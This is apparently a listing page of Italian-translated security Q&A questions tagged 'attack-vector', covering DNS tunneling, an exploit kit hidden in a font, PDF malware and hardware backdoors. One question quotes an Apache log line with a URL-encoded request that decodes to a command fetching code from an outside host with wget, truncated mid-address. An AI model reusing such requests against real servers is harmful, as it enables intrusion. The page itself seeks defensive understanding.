Domande con tag 'attack-vector'

1
risposta

DNS Tunneling - Mitigazione

Credo che la causa principale del tunneling DNS sia perché agli host interni è permesso fare query ricorsive di domini esterni. Affinché il tunneling DNS funzioni, un host interno dovrebbe essere in grado di inviare query al dominio controllato...
posta 01.02.2017 - 06:58
1
risposta

Cufon o Prototype come vettore di attacco per il kit di exploit Blackhole?

Mi è stato chiesto di esaminare la sicurezza di un sito client che apparentemente genera messaggi antivirali quando viene visitato. Specifiche: Viene rilevato come kit di exploit Blackhole all'interno di un font Cufon. L'exploit aggiung...
posta 02.11.2012 - 11:37
5
risposte

vulnerabilità SHA1

Attualmente stiamo integrando con un componente di terze parti nella nostra applicazione web. Parte di questa integrazione richiede l'invio di dati su http. Questo viene fatto tramite i parametri POST. Nella richiesta è incluso un parametro aggi...
posta 04.11.2016 - 09:01
3
risposte

Gli account di amministratore inattivi devono essere CANCELLATI / cancellati?

Data: Un'applicazione web Alcuni account amministratore attivi. Alcuni account di amministratore inattivi. Nessun meccanismo di "controllo" esistente per conservare i vecchi account. Gli amministratori non attivi non possono accedere...
posta 22.11.2016 - 20:10
1
risposta

Come può funzionare questo attacco?

Stavo navigando nei miei log di apache e ho trovato la seguente richiesta (che ha provocato un 404): 106.75.130.216 - - [DD/MMM/YYYY:hh:mm:ss] "GET /shell?%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%68%74%74%70%3A%2F%2F%36%31%2E%31%36%30%2E%32%...
posta 26.03.2017 - 20:29
2
risposte

Domande su Rakshasa

Riguardo a Hardware Backdooring è pratico parlare a Def Con 20 nel 2012: Che cosa significa lo sviluppatore per "Il carico utile viene avviato tramite Networkboot"? In che modo il bootkit (una versione modificata di Kon-Boot) infet...
posta 22.07.2015 - 00:15
1
risposta

Trovare tutti gli entry point AJAX

C'è qualche strumento per (automaticamente) trovare tutti gli entrypoint di backend JavaScript all'interno di un sito? Devo controllare un sito per le vulnerabilità nel codice backend che convalida i parametri AJAX e vorrei prima generare un...
posta 01.02.2013 - 17:43
1
risposta

L'uso di JavaScript da LastPass per crittografare e decrittografare il database delle password è un approccio sicuro?

LastPass è un gestore di password di alto livello che viene fornito come estensione per il browser e utilizza una password principale per crittografare e decrittografare il database delle password utilizzando JavaScript. È un modo sicuro di fare...
posta 12.11.2014 - 07:20
4
risposte

Rimuovere il malware PDF ristampando su nuovo pdf o estratto di testo?

Considera che hai un file PDF sospetto che potrebbe contenere malware. Sarebbe sufficiente per: (1) apri il file pdf in un ambiente virtuale e consenti al pdf viewer o al programma pdf-creator "print-to-file" un nuovo file pdf pulito da quell...
posta 03.01.2015 - 05:03
1
risposta

Quale tipo di attacco può ripristinare i privilegi MySQL e smontare le unità remote senza root o shell?

VETTORE DI ATTACCO Colpi mensili tramite un attacco DDoS globale. Risolto con Cloudflare. Ora l'attaccante può smontare in qualche modo i collegamenti delle unità di rete e ripristinare le autorizzazioni utente MySQL per le applicazioni....
posta 04.03.2015 - 05:06